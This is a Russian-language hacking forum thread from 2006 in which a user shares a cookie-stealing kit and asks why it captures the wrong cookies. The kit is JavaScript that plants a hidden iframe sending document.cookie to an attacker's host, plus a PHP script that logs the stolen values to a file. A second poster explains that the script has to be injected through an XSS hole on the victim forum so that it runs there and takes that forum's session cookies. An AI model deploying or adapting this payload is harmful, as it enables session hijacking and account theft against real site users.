Скрипты для кражи куков — HackZona.Ru

Прива, требуется совет. Нарыл где то скрипты для снифа куков. Там говорится [code:1:deef8e0b4d] document.write('<ifra*me width=1 height=1 style="position: absolute; visibility: hidden;" src="'+ 'http://xss.host.ru/xss.php'+ '?['+location.host+']:'+ document.cookie+'"> </ifra*me>'); [/code:1:deef8e0b4d] это пихается в xss.js Потом: [code:1:deef8e0b4d] <? $file = fopen("cookies","a"); fputs($file,"[".date("d.m.y H:i")."]".$QUERY_STRING."\r\n"); fclose($file); ?> [/code:1:deef8e0b4d] это в xss.php залил я это дело на холм (есессно, заменив строчку _http://xss.host.ru/ на свой сайт) ну и зашел я с форума, где в куках мой логин и пасс лежат, по ссылке _http://my_site.h1.ru/xss.js потом глянул на фтп — файл cookies создался, там печатается время, но почему то написано, что зашел я с сайта _http://my_site.h1.ru/ и вот эта строчка [24.09.06 11:31][my_s

Скрипты для кражи куков

Сообщений в теме: 3
MaD_Spirit
Нравится
Не нравится
Репутация: 0
Рейтинг: 0
Кол-во тем: 0
Сообщения: 0
Прива, требуется совет.

Нарыл где то скрипты для снифа куков.

Там говорится
[code:1:deef8e0b4d]
document.write('<ifra*me
width=1 height=1
style="position: absolute;
visibility:
hidden;"
src="'+
'http://xss.host.ru/xss.php'+
'?['+location.host+']:'+
document.cookie+'">
</ifra*me>');
[/code:1:deef8e0b4d]
это пихается в xss.js

Потом:
[code:1:deef8e0b4d]
<?
$file = fopen("cookies","a");
fputs($file,"[".date("d.m.y H:i")."]".$QUERY_STRING."\r\n");
fclose($file);
?>
[/code:1:deef8e0b4d]
это в xss.php

залил я это дело на холм (есессно, заменив строчку _http://xss.host.ru/ на свой сайт)

ну и зашел я с форума, где в куках мой логин и пасс лежат, по ссылке _http://my_site.h1.ru/xss.js
потом глянул на фтп — файл cookies создался, там печатается время, но почему то написано, что зашел я с сайта _http://my_site.h1.ru/
и вот эта строчка

[24.09.06 11:31][my_site.h1.ru]:952454ca2641323cc2978fa4fb43a586=admin;%20ap=1

*************************
соответственно вопрос — что я не так делаю?
бага в скриптах или я неправильно их юзаю?
13:33 Ответить
ShineShadow
Нравится
Не нравится
Репутация: 0
Рейтинг: 0
Кол-во тем: 0
Сообщения: 0
:) Естественно, если xss.js лежит на _http://my_site.h1.ru/, то и куки будут с этого сайта! xss.js должен находится на уязвимом форуме!
01:25 Ответить
MaD_Spirit - автор темы
Нравится
Не нравится
Репутация: 0
Рейтинг: 0
Кол-во тем: 0
Сообщения: 0
погоди
или я тупил по страшному все это время или я даже не знаю что.

еси я даю в хсс-дыре скрипт на этот сниффер и еси я просто захожу на этот сниффер с форума с куками — это не одно и тоже? просто скрипт на хсс.js воткнул в хтмл-страницу — он же должен выполнятся?

PS или тогда строчку [+local.host+] надо менять на ту, откуда куки собираюсь переть?
18:40 Ответить
ShineShadow
Нравится
Не нравится
Репутация: 0
Рейтинг: 0
Кол-во тем: 0
Сообщения: 0
Это не одно и тоже! XSS позволяет выполнить твой скрипт (xss.js) в контексте уязвимого сайта и куки ты получишь с уязвимого сайта. А когда ты просто переходишь по ссылке, то броузер просто загружает другой сайт и скрипт выполняется в контексте этого другого сайта, и куки будут не с форума! А в твоем случае получается, что и XSS не нужен :)
Никакие строчки менять не надо! Просто надо найти на форуме XSS и вставить туда ссылку на xss.js.
10:27 Ответить
Ответить
Для того, чтобы отвечать в темах на форуме необходимо войти на сайт или зарегистрироваться.